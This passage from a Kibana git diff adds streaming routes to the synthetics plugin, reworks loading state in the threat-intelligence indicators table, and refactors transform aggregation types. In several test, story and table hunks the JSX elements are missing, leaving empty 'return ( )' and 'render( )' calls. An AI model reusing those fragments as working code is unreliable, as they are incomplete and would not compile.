pushMonitorFormatter.failedStaleMonitors, - }, - }); + }); + } catch (error) { + subject?.error(error); + } finally { + subject?.complete(); + } }, }); diff --git a/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts b/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts index b321635d3f569..6c247dde94c04 100644 --- a/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts +++ b/x-pack/plugins/synthetics/server/routes/synthetics_service/get_service_allowed.ts @@ -12,9 +12,11 @@ export const getServiceAllowedRoute: SyntheticsRestApiRouteFactory = () => ({ method: 'GET', path: API_URLS.SERVICE_ALLOWED, validate: {}, - handler: async ({ syntheticsMonitorClient }): Promise => { + handler: async ({ syntheticsMonitorClient, server }): Promise => { + const isCloud = Boolean(server.cloud?.isCloudEnabled); + return { - serviceAllowed: syntheticsMonitorClient.syntheticsService.isAllowed, + serviceAllowed: isCloud ? syntheticsMonitorClient.syntheticsService.isAllowed : true, signupUrl: syntheticsMonitorClient.syntheticsService.signupUrl, }; }, diff --git a/x-pack/plugins/synthetics/server/server.ts b/x-pack/plugins/synthetics/server/server.ts index a4821c29759e8..12844c9cb9223 100644 --- a/x-pack/plugins/synthetics/server/server.ts +++ b/x-pack/plugins/synthetics/server/server.ts @@ -4,18 +4,21 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ - +import { Subject } from 'rxjs'; +import { UptimeRequestHandlerContext } from './types'; import { createSyntheticsRouteWithAuth } from './routes/create_route_with_auth'; import { SyntheticsMonitorClient } from './synthetics_service/synthetics_monitor/synthetics_monitor_client'; import { syntheticsRouteWrapper } from './synthetics_route_wrapper'; import { uptimeRequests } from './legacy_uptime/lib/requests'; -import { syntheticsAppRestApiRoutes } from './routes'; -import { UptimeServerSetup } from './legacy_uptime/lib/adapters'; +import { syntheticsAppRestApiRoutes, syntheticsAppStreamingApiRoutes } from './routes'; +import { UptimeServerSetup, UptimeCorePluginsSetup } from './legacy_uptime/lib/adapters'; import { licenseCheck } from './legacy_uptime/lib/domains'; +import type { SyntheticsRequest } from './legacy_uptime/routes/types'; export const initSyntheticsServer = ( server: UptimeServerSetup, - syntheticsMonitorClient: SyntheticsMonitorClient + syntheticsMonitorClient: SyntheticsMonitorClient, + plugins: UptimeCorePluginsSetup ) => { const libs = { requests: uptimeRequests, @@ -52,4 +55,34 @@ export const initSyntheticsServer = ( throw new Error(`Handler for method ${method} is not defined`); } }); + + syntheticsAppStreamingApiRoutes.forEach((route) => { + const { method, streamHandler, path } = syntheticsRouteWrapper( + createSyntheticsRouteWithAuth(libs, route), + server, + syntheticsMonitorClient + ); + + plugins.bfetch.addStreamingResponseRoute( + path, + (request, context) => { + return { + getResponseStream: ({ data }: any) => { + const subject = new Subject(); + + if (streamHandler) { + streamHandler( + context as UptimeRequestHandlerContext, + request as SyntheticsRequest, + subject + ); + } + return subject; + }, + }; + }, + method, + server.router + ); + }); }; diff --git a/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts b/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts index a5e28aa051b98..8706735fa9256 100644 --- a/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts +++ b/x-pack/plugins/synthetics/server/synthetics_route_wrapper.ts @@ -4,12 +4,11 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ - import { KibanaResponse } from '@kbn/core-http-router-server-internal'; import { enableInspectEsQueries } from '@kbn/observability-plugin/common'; import { createUptimeESClient, inspectableEsQueriesMap } from './legacy_uptime/lib/lib'; import { syntheticsServiceApiKey } from './legacy_uptime/lib/saved_objects/service_api_key'; -import { SyntheticsRouteWrapper } from './legacy_uptime/routes'; +import { SyntheticsRouteWrapper, SyntheticsStreamingRouteHandler } from './legacy_uptime/routes'; import { API_URLS } from '../common/constants'; export const syntheticsRouteWrapper: SyntheticsRouteWrapper = ( @@ -21,6 +20,48 @@ export const syntheticsRouteWrapper: SyntheticsRouteWrapper = ( options: { tags: ['access:uptime-read', ...(uptimeRoute?.writeAccess ? ['access:uptime-write'] : [])], }, + streamHandler: async (context, request, subject) => { + const coreContext = await context.core; + const { client: esClient } = coreContext.elasticsearch; + const savedObjectsClient = coreContext.savedObjects.getClient({ + includedHiddenTypes: [syntheticsServiceApiKey.name], + }); + + // specifically needed for the synthetics service api key generation + server.authSavedObjectsClient = savedObjectsClient; + + const isInspectorEnabled = await coreContext.uiSettings.client.get( + enableInspectEsQueries + ); + + const uptimeEsClient = createUptimeESClient({ + request, + savedObjectsClient, + isInspectorEnabled, + esClient: esClient.asCurrentUser, + }); + + server.uptimeEsClient = uptimeEsClient; + + if ( + (isInspectorEnabled || server.isDev) && + server.config.service?.username !== 'localKibanaIntegrationTestsUser' + ) { + inspectableEsQueriesMap.set(request, []); + } + + const res = await (uptimeRoute.handler as SyntheticsStreamingRouteHandler)({ + uptimeEsClient, + savedObjectsClient, + context, + request, + server, + syntheticsMonitorClient, + subject, + }); + + return res; + }, handler: async (context, request, response) => { const coreContext = await context.core; const { client: esClient } = coreContext.elasticsearch; diff --git a/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts b/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts index 565d509a8e5c9..3067ee6319052 100644 --- a/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts +++ b/x-pack/plugins/synthetics/server/synthetics_service/project_monitor_formatter.ts @@ -4,6 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ +import type { Subject } from 'rxjs'; import { isEqual } from 'lodash'; import { KibanaRequest } from '@kbn/core/server'; import { @@ -63,6 +64,7 @@ export class ProjectMonitorFormatter { private projectFilter: string; private syntheticsMonitorClient: SyntheticsMonitorClient; private request: KibanaRequest; + private subject?: Subject; constructor({ locations, @@ -76,6 +78,7 @@ export class ProjectMonitorFormatter { server, syntheticsMonitorClient, request, + subject, }: { locations: Locations; privateLocations: Locations; @@ -88,6 +91,7 @@ export class ProjectMonitorFormatter { server: UptimeServerSetup; syntheticsMonitorClient: SyntheticsMonitorClient; request: KibanaRequest; + subject?: Subject; }) { this.projectId = projectId; this.spaceId = spaceId; @@ -101,6 +105,7 @@ export class ProjectMonitorFormatter { this.server = server; this.projectFilter = `${syntheticsMonitorType}.attributes.${ConfigKey.PROJECT_ID}: "${this.projectId}"`; this.request = request; + this.subject = subject; } public configureAllProjectMonitors = async () => { @@ -158,23 +163,11 @@ export class ProjectMonitorFormatter { if (this.staleMonitorsMap[monitor.id]) { this.staleMonitorsMap[monitor.id].stale = false; } + this.handleStreamingMessage({ message: `${monitor.id}: monitor updated successfully` }); } else { - const newMonitor = await this.savedObjectsClient.create( - syntheticsMonitorType, - formatSecrets({ - ...normalizedMonitor, - revision: 1, - }) - ); - await syncNewMonitor({ - server: this.server, - monitor: normalizedMonitor, - monitorSavedObject: newMonitor, - syntheticsMonitorClient: this.syntheticsMonitorClient, - savedObjectsClient: this.savedObjectsClient, - request: this.request, - }); + await this.createMonitor(normalizedMonitor); this.createdMonitors.push(monitor.id); + this.handleStreamingMessage({ message: `${monitor.id}: monitor created successfully` }); } } catch (e) { this.server.logger.error(e); @@ -184,6 +177,7 @@ export class ProjectMonitorFormatter { details: e.message, payload: monitor, }); + this.handleStreamingMessage({ message: `${monitor.id}: failed to create or update monitor` }); if (this.staleMonitorsMap[monitor.id]) { this.staleMonitorsMap[monitor.id].stale = false; } @@ -235,6 +229,24 @@ export class ProjectMonitorFormatter { return savedObjects?.[0]; }; + private createMonitor = async (normalizedMonitor: BrowserFields) => { + const newMonitor = await this.savedObjectsClient.create( + syntheticsMonitorType, + formatSecrets({ + ...normalizedMonitor, + revision: 1, + }) + ); + await syncNewMonitor({ + server: this.server, + monitor: normalizedMonitor, + monitorSavedObject: newMonitor, + syntheticsMonitorClient: this.syntheticsMonitorClient, + savedObjectsClient: this.savedObjectsClient, + request: this.request, + }); + }; + private updateMonitor = async ( previousMonitor: SavedObjectsFindResult, normalizedMonitor: BrowserFields @@ -325,12 +337,20 @@ export class ProjectMonitorFormatter { request: this.request, }); this.deletedMonitors.push(journeyId); + this.handleStreamingMessage({ message: `Monitor ${journeyId} deleted successfully` }); } catch (e) { + this.handleStreamingMessage({ message: `Monitor ${journeyId} could not be deleted` }); this.failedStaleMonitors.push({ - id: monitorId, + id: journeyId, reason: 'Failed to delete stale monitor', details: e.message, }); } }; + + private handleStreamingMessage = async ({ message }: { message: string }) => { + if (this.subject) { + this.subject?.next(message); + } + }; } diff --git a/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts b/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts index e0e7ddd3e79a4..a16e01189f4c7 100644 --- a/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts +++ b/x-pack/plugins/task_manager/server/monitoring/monitoring_stats_stream.ts @@ -7,7 +7,7 @@ import { merge, of, Observable } from 'rxjs'; import { map, scan } from 'rxjs/operators'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { Logger } from '@kbn/core/server'; import { JsonObject } from '@kbn/utility-types'; import { TaskStore } from '../task_store'; diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx index 8eed98a65a918..1aa17259ddd82 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.stories.tsx @@ -42,7 +42,6 @@ export function WithIndicators() { return ( ); } + +export function Loading() { + return ( + + ); +} diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx index 7eeb78a0753cc..1014e797c21cb 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.test.tsx @@ -21,7 +21,6 @@ const tableProps: IndicatorsTableProps = { indicators: [], pagination: { pageSize: 10, pageIndex: 0, pageSizeOptions: [10] }, indicatorCount: 0, - firstLoad: false, loading: false, indexPatterns: [], }; @@ -42,11 +41,11 @@ const indicatorsFixture: Indicator[] = [ ]; describe('', () => { - it('should render loading spinner on first load', async () => { + it('should render loading spinner when loading', async () => { await act(async () => { render( - + ); }); @@ -54,13 +53,13 @@ describe('', () => { expect(screen.queryByRole('progressbar')).toBeInTheDocument(); }); - it('should render datagrid when first load is done', async () => { + it('should render datagrid when loading is done', async () => { await act(async () => { render( diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx index 996c702bcf8ae..b8b1f879e0f29 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/components/indicators_table/indicators_table.tsx @@ -6,7 +6,14 @@ */ import React, { VFC, useState, useMemo } from 'react'; -import { EuiDataGrid, EuiLoadingSpinner, EuiText } from '@elastic/eui'; +import { + EuiDataGrid, + EuiFlexGroup, + EuiFlexItem, + EuiLoadingSpinner, + EuiPanel, + EuiText, +} from '@elastic/eui'; import { FormattedMessage } from '@kbn/i18n-react'; import { i18n } from '@kbn/i18n'; @@ -24,6 +31,12 @@ interface Column { } const columns: Column[] = [ + { + id: RawIndicatorFieldId.TimeStamp, + displayAsText: i18n.translate('xpack.threatIntelligence.indicator.table.timestampColumnTitle', { + defaultMessage: '@timestamp', + }), + }, { id: ComputedIndicatorFieldId.DisplayValue, displayAsText: i18n.translate('xpack.threatIntelligence.indicator.table.indicatorColumTitle', { @@ -57,15 +70,6 @@ const columns: Column[] = [ defaultMessage: 'Last seen', }), }, - { - id: RawIndicatorFieldId.MarkingTLP, - displayAsText: i18n.translate( - 'xpack.threatIntelligence.indicator.table.tlpMarketingColumTitle', - { - defaultMessage: 'TLP Marking', - } - ), - }, ]; export type IndicatorsTableProps = Omit & { @@ -80,7 +84,6 @@ export const IndicatorsTable: VFC = ({ onChangePage, onChangeItemsPerPage, pagination, - firstLoad, loading, indexPatterns, }) => { @@ -141,11 +144,19 @@ export const IndicatorsTable: VFC = ({ [renderCellValue] ); - if (firstLoad) { - return ; + if (loading) { + return ( + + + + + + + + ); } - if (!loading && !indicatorCount) { + if (!indicatorCount) { return ; } diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts b/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts index f416cfc946a5d..a1fc3cf94c290 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/hooks/use_indicators.ts @@ -35,7 +35,6 @@ export interface UseIndicatorsValue { pagination: Pagination; onChangeItemsPerPage: (value: number) => void; onChangePage: (value: number) => void; - firstLoad: boolean; loading: boolean; } @@ -73,7 +72,6 @@ export const useIndicators = ({ const [indicators, setIndicators] = useState([]); const [indicatorCount, setIndicatorCount] = useState(0); - const [firstLoad, setFirstLoad] = useState(true); const [loading, setLoading] = useState(true); const [pagination, setPagination] = useState({ @@ -148,14 +146,12 @@ export const useIndicators = ({ searchSubscription$.current?.unsubscribe(); } - setFirstLoad(false); setLoading(false); }, error: (msg) => { searchService.showError(msg); searchSubscription$.current?.unsubscribe(); - setFirstLoad(false); setLoading(false); }, }); @@ -201,7 +197,6 @@ export const useIndicators = ({ pagination, onChangePage, onChangeItemsPerPage, - firstLoad, loading, handleRefresh, }; diff --git a/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx b/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx index 178c58bc02641..81a3698edef3c 100644 --- a/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx +++ b/x-pack/plugins/threat_intelligence/public/modules/indicators/indicators_page.test.tsx @@ -32,10 +32,9 @@ const stub = () => {}; describe('', () => { beforeAll(() => { (useIndicators as jest.MockedFunction).mockReturnValue({ - indicators: [], - indicatorCount: 0, - firstLoad: false, - loading: true, + indicators: [{ fields: {} }], + indicatorCount: 1, + loading: false, pagination: { pageIndex: 0, pageSize: 10, pageSizeOptions: [10] }, onChangeItemsPerPage: stub, onChangePage: stub, diff --git a/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts b/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts index c02e8eb2f4487..2d7096a211a7f 100644 --- a/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts +++ b/x-pack/plugins/timelines/server/search_strategy/timeline/factory/helpers/build_object_recursive.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get } from 'lodash/fp'; import { Ecs } from '../../../../../common/ecs'; import { Fields } from '../../../../../common/search_strategy'; diff --git a/x-pack/plugins/transform/common/types/pivot_aggs.ts b/x-pack/plugins/transform/common/types/pivot_aggs.ts index 44308940a5870..a720e4bbeb4ba 100644 --- a/x-pack/plugins/transform/common/types/pivot_aggs.ts +++ b/x-pack/plugins/transform/common/types/pivot_aggs.ts @@ -5,8 +5,8 @@ * 2.0. */ +import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; import { AggName } from './aggregations'; -import { EsFieldName } from './fields'; export const PIVOT_SUPPORTED_AGGS = { AVG: 'avg', @@ -23,11 +23,7 @@ export const PIVOT_SUPPORTED_AGGS = { export type PivotSupportedAggs = typeof PIVOT_SUPPORTED_AGGS[keyof typeof PIVOT_SUPPORTED_AGGS]; -export type PivotAgg = { - [key in PivotSupportedAggs]?: { - field: EsFieldName; - }; -}; +export type PivotAgg = estypes.AggregationsAggregationContainer; export type PivotAggDict = { [key in AggName]: PivotAgg; diff --git a/x-pack/plugins/transform/public/app/common/index.ts b/x-pack/plugins/transform/public/app/common/index.ts index 7a84ef9c8baa3..1f397ee4285ef 100644 --- a/x-pack/plugins/transform/public/app/common/index.ts +++ b/x-pack/plugins/transform/public/app/common/index.ts @@ -37,7 +37,7 @@ export type { } from './pivot_aggs'; export { getEsAggFromAggConfig, - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, isPivotAggsConfigPercentiles, isPivotAggsConfigTerms, PERCENTILES_AGG_DEFAULT_PERCENTS, diff --git a/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts b/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts index 84b47eca0fceb..61945773faece 100644 --- a/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts +++ b/x-pack/plugins/transform/public/app/common/pivot_aggs.test.ts @@ -68,7 +68,7 @@ describe('getAggConfigFromEsAgg', () => { }); }); - test('should resolve percentiles agg in sub-aggregations', () => { + test('should resolve percentiles and terms agg in sub-aggregations', () => { const esConfig = { filter: { exists: { @@ -82,6 +82,12 @@ describe('getAggConfigFromEsAgg', () => { percents: [1, 5, 25, 50, 75, 95, 99], }, }, + check_terms: { + terms: { + field: 'products.base_price', + size: 3, + }, + }, }, }; @@ -93,6 +99,20 @@ describe('getAggConfigFromEsAgg', () => { dropDownName: 'products.base_price.percentiles', field: 'products.base_price', parentAgg: result, + aggConfig: { + percents: '1,5,25,50,75,95,99', + }, + }); + + expect(result.subAggs!.check_terms).toMatchObject({ + agg: 'terms', + aggName: 'check_terms', + dropDownName: 'check_terms', + field: 'products.base_price', + parentAgg: result, + aggConfig: { + size: 3, + }, }); }); diff --git a/x-pack/plugins/transform/public/app/common/pivot_aggs.ts b/x-pack/plugins/transform/public/app/common/pivot_aggs.ts index a314a0193bcd7..4349b4962556f 100644 --- a/x-pack/plugins/transform/public/app/common/pivot_aggs.ts +++ b/x-pack/plugins/transform/public/app/common/pivot_aggs.ts @@ -13,8 +13,8 @@ import { isPopulatedObject } from '@kbn/ml-is-populated-object'; import type { AggName } from '../../../common/types/aggregations'; import type { Dictionary } from '../../../common/types/common'; import type { EsFieldName } from '../../../common/types/fields'; -import type { PivotAgg, PivotSupportedAggs } from '../../../common/types/pivot_aggs'; -import { PIVOT_SUPPORTED_AGGS } from '../../../common/types/pivot_aggs'; +import type { PivotSupportedAggs } from '../../../common/types/pivot_aggs'; +import { PIVOT_SUPPORTED_AGGS, PivotAgg } from '../../../common/types/pivot_aggs'; import { getAggFormConfig } from '../sections/create_transform/components/step_define/common/get_agg_form_config'; import { PivotAggsConfigFilter } from '../sections/create_transform/components/step_define/common/filter_agg/types'; @@ -115,7 +115,7 @@ export const TOP_METRICS_SPECIAL_SORT_FIELDS = { _SCORE: '_score', } as const; -export const isSpecialSortField = (sortField: unknown) => { +export const isSpecialSortField = (sortField: unknown): sortField is string => { return Object.values(TOP_METRICS_SPECIAL_SORT_FIELDS).some((v) => v === sortField); }; @@ -205,19 +205,21 @@ export interface PivotAggsConfigWithUiBase extends PivotAggsConfigBase { field: EsFieldName | EsFieldName[] | null; } -export interface PivotAggsConfigWithExtra extends PivotAggsConfigWithUiBase { +export interface PivotAggsConfigWithExtra + extends PivotAggsConfigWithUiBase { /** Form component */ AggFormComponent: FC<{ aggConfig: Partial; onChange: (arg: Partial) => void; selectedField: string; + isValid?: boolean; }>; /** Aggregation specific configuration */ aggConfig: Partial; /** Set UI configuration from ES aggregation definition */ - setUiConfigFromEs: (arg: { [key: string]: any }) => void; + setUiConfigFromEs: (arg: ESConfig) => void; /** Converts UI agg config form to ES agg request object */ - getEsAggConfig: () => { [key: string]: any } | null; + getEsAggConfig: () => ESConfig | null; /** Indicates if the configuration is valid */ isValid: () => boolean; /** Provides aggregation name generated based on the configuration */ @@ -242,7 +244,7 @@ export type PivotAggsConfigWithUiSupport = | PivotAggsConfigTerms | PivotAggsConfigWithExtendedForm; -export function isPivotAggsConfigWithUiSupport(arg: unknown): arg is PivotAggsConfigWithUiSupport { +export function isPivotAggsConfigWithUiBase(arg: unknown): arg is PivotAggsConfigWithUiBase { return ( isPopulatedObject(arg, ['agg', 'aggName', 'dropDownName', 'field']) && isPivotSupportedAggs(arg.agg) @@ -256,8 +258,7 @@ type PivotAggsConfigWithExtendedForm = PivotAggsConfigFilter | PivotAggsConfigTo export function isPivotAggsWithExtendedForm(arg: unknown): arg is PivotAggsConfigWithExtendedForm { return ( - (isPopulatedObject(arg) && arg.hasOwnProperty('setUiConfigFromEs')) || - isPopulatedObject(arg, ['AggFormComponent']) + isPopulatedObject(arg, ['setUiConfigFromEs']) || isPopulatedObject(arg, ['AggFormComponent']) ); } @@ -288,7 +289,7 @@ export type PivotAggsConfigDict = Dictionary; export function getEsAggFromAggConfig( pivotAggsConfig: PivotAggsConfigBase | PivotAggsConfigWithExtendedForm ): PivotAgg | null { - let esAgg: { [key: string]: any } | null = { ...pivotAggsConfig }; + let esAgg: { [key: string]: any } = { ...pivotAggsConfig }; delete esAgg.agg; delete esAgg.aggName; @@ -296,7 +297,7 @@ export function getEsAggFromAggConfig( delete esAgg.parentAgg; if (isPivotAggsWithExtendedForm(pivotAggsConfig)) { - esAgg = pivotAggsConfig.getEsAggConfig(); + esAgg = pivotAggsConfig.getEsAggConfig() as PivotAgg; if (esAgg === null) { return null; @@ -305,16 +306,16 @@ export function getEsAggFromAggConfig( const result = { [pivotAggsConfig.agg]: esAgg, - }; + } as PivotAgg; if ( - isPivotAggsConfigWithUiSupport(pivotAggsConfig) && + isPivotAggsConfigWithUiBase(pivotAggsConfig) && pivotAggsConfig.subAggs !== undefined && Object.keys(pivotAggsConfig.subAggs).length > 0 ) { result.aggs = {}; for (const subAggConfig of Object.values(pivotAggsConfig.subAggs)) { - result.aggs[subAggConfig.aggName] = getEsAggFromAggConfig(subAggConfig); + result.aggs[subAggConfig.aggName] = getEsAggFromAggConfig(subAggConfig) as PivotAgg; } } diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx index a29d69400734f..7d3e781c3bdb4 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/agg_label_form.tsx @@ -14,7 +14,7 @@ import { EuiButtonIcon, EuiFlexGroup, EuiFlexItem, EuiPopover, EuiTextColor } fr import { AggName } from '../../../../../../common/types/aggregations'; import { - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, PivotAggsConfig, PivotAggsConfigWithUiSupportDict, } from '../../../../common'; @@ -50,7 +50,7 @@ export const AggLabelForm: React.FC = ({ const helperText = isPivotAggsWithExtendedForm(item) && item.helperText && item.helperText(); const isSubAggSupported = - isPivotAggsConfigWithUiSupport(item) && + isPivotAggsConfigWithUiBase(item) && item.isSubAggsSupported && (isPivotAggsWithExtendedForm(item) ? item.isValid() : true); diff --git a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx index 040187f239581..56eeea8a242c0 100644 --- a/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx +++ b/x-pack/plugins/transform/public/app/sections/create_transform/components/aggregation_list/popover_form.tsx @@ -13,7 +13,6 @@ import { EuiButton, EuiCodeBlock, EuiComboBox, - EuiFieldNumber, EuiFieldText, EuiForm, EuiFormRow, @@ -25,19 +24,12 @@ import { cloneDeep } from 'lodash'; import useUpdateEffect from 'react-use/lib/useUpdateEffect'; import { AggName } from '../../../../../../common/types/aggregations'; import { dictionaryToArray } from '../../../../../../common/types/common'; -import { - PivotSupportedAggs, - PIVOT_SUPPORTED_AGGS, -} from '../../../../../../common/types/pivot_aggs'; +import { PivotSupportedAggs } from '../../../../../../common/types/pivot_aggs'; import { isAggName, - isPivotAggsConfigPercentiles, - isPivotAggsConfigTerms, - isPivotAggsConfigWithUiSupport, + isPivotAggsConfigWithUiBase, getEsAggFromAggConfig, - PERCENTILES_AGG_DEFAULT_PERCENTS, - TERMS_AGG_DEFAULT_SIZE, PivotAggsConfig, PivotAggsConfigWithUiSupportDict, } from '../../../../common'; @@ -51,77 +43,23 @@ interface Props { onChange(d: PivotAggsConfig): void; } -function getDefaultPercents(defaultData: PivotAggsConfig): number[] | undefined { - if (isPivotAggsConfigPercentiles(defaultData)) { - return defaultData.percents; - } -} - -function parsePercentsInput(inputValue: string | undefined) { - if (inputValue !== undefined) { - const strVals: string[] = inputValue.split(','); - const percents: number[] = []; - for (const str of strVals) { - if (str.trim().length > 0 && isNaN(str as any) === false) { - const val = Number(str); - if (val >= 0 && val <= 100) { - percents.push(val); - } else { - return []; - } - } - } - - return percents; - } - - return []; -} - -// Input string should only include comma separated numbers -function isValidPercentsInput(inputValue: string) { - return /^[0-9]+(,[0-9]+)*$/.test(inputValue); -} - -function getDefaultSize(defaultData: PivotAggsConfig): number | undefined { - if (isPivotAggsConfigTerms(defaultData)) { - return defaultData.size; - } -} - -function parseSizeInput(inputValue: string | undefined) { - if (inputValue !== undefined && isValidSizeInput(inputValue)) { - return parseInt(inputValue, 10); - } - - return TERMS_AGG_DEFAULT_SIZE; -} - -// Input string should only include numbers -function isValidSizeInput(inputValue: string) { - return /^\d+$/.test(inputValue); -} - export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onChange, options }) => { const [aggConfigDef, setAggConfigDef] = useState(cloneDeep(defaultData)); const [aggName, setAggName] = useState(defaultData.aggName); const [agg, setAgg] = useState(defaultData.agg); const [field, setField] = useState( - isPivotAggsConfigWithUiSupport(defaultData) ? defaultData.field : '' + isPivotAggsConfigWithUiBase(defaultData) ? defaultData.field : '' ); - const [percents, setPercents] = useState(getDefaultPercents(defaultData)); - const [validPercents, setValidPercents] = useState(agg === PIVOT_SUPPORTED_AGGS.PERCENTILES); - const [size, setSize] = useState(getDefaultSize(defaultData)); - const [validSize, setValidSize] = useState(agg === PIVOT_SUPPORTED_AGGS.TERMS); - - const isUnsupportedAgg = !isPivotAggsConfigWithUiSupport(defaultData); + const isUnsupportedAgg = !isPivotAggsConfigWithUiBase(defaultData); // Update configuration based on the aggregation type useEffect(() => { if (agg === aggConfigDef.agg) return; const config = getAggFormConfig(agg, { + parentAgg: aggConfigDef.parentAgg, + subAggs: aggConfigDef.subAggs, agg, aggName, dropDownName: aggName, @@ -129,7 +67,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha }); setAggConfigDef(config); // eslint-disable-next-line react-hooks/exhaustive-deps - }, [agg]); + }, [agg, aggConfigDef]); useUpdateEffect(() => { if (isPivotAggsWithExtendedForm(aggConfigDef)) { @@ -145,30 +83,12 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha function updateAgg(aggVal: PivotSupportedAggs) { setAgg(aggVal); - if (aggVal === PIVOT_SUPPORTED_AGGS.PERCENTILES && percents === undefined) { - setPercents(PERCENTILES_AGG_DEFAULT_PERCENTS); - } - if (aggVal === PIVOT_SUPPORTED_AGGS.TERMS && size === undefined) { - setSize(TERMS_AGG_DEFAULT_SIZE); - } - } - - function updatePercents(inputValue: string) { - setPercents(parsePercentsInput(inputValue)); - setValidPercents(isValidPercentsInput(inputValue)); - } - - function updateSize(inputValue: string) { - setSize(parseSizeInput(inputValue)); - setValidSize(isValidSizeInput(inputValue)); } function getUpdatedItem(): PivotAggsConfig { - let updatedItem: PivotAggsConfig; - let resultField = field; if ( - isPivotAggsConfigWithUiSupport(aggConfigDef) && + isPivotAggsConfigWithUiBase(aggConfigDef) && !aggConfigDef.isMultiField && Array.isArray(field) ) { @@ -176,33 +96,13 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha resultField = field[0]; } - if (agg === PIVOT_SUPPORTED_AGGS.PERCENTILES) { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - percents, - }; - } else if (agg === PIVOT_SUPPORTED_AGGS.TERMS) { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - size, - }; - } else { - updatedItem = { - ...aggConfigDef, - agg, - aggName, - field: resultField, - dropDownName: defaultData.dropDownName, - }; - } + const updatedItem = { + ...aggConfigDef, + agg, + aggName, + field: resultField, + dropDownName: defaultData.dropDownName, + }; return updatedItem; } @@ -219,7 +119,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha optionsArr .filter( (o) => - isPivotAggsConfigWithUiSupport(defaultData) && + isPivotAggsConfigWithUiBase(defaultData) && (Array.isArray(defaultData.field) ? defaultData.field.includes(o.field as string) : o.field === defaultData.field) @@ -246,23 +146,8 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha }); } - let percentsText; - if (percents !== undefined) { - percentsText = percents.toString(); - } - - let sizeText; - if (size !== undefined) { - sizeText = size.toString(); - } - let formValid = validAggName; - if (formValid && agg === PIVOT_SUPPORTED_AGGS.PERCENTILES) { - formValid = validPercents; - } - if (formValid && agg === PIVOT_SUPPORTED_AGGS.TERMS) { - formValid = validSize; - } + if (isPivotAggsWithExtendedForm(aggConfigDef)) { formValid = validAggName && aggConfigDef.isValid(); } @@ -351,7 +236,7 @@ export const PopoverForm: React.FC = ({ defaultData, otherAggNames, onCha /> )} - 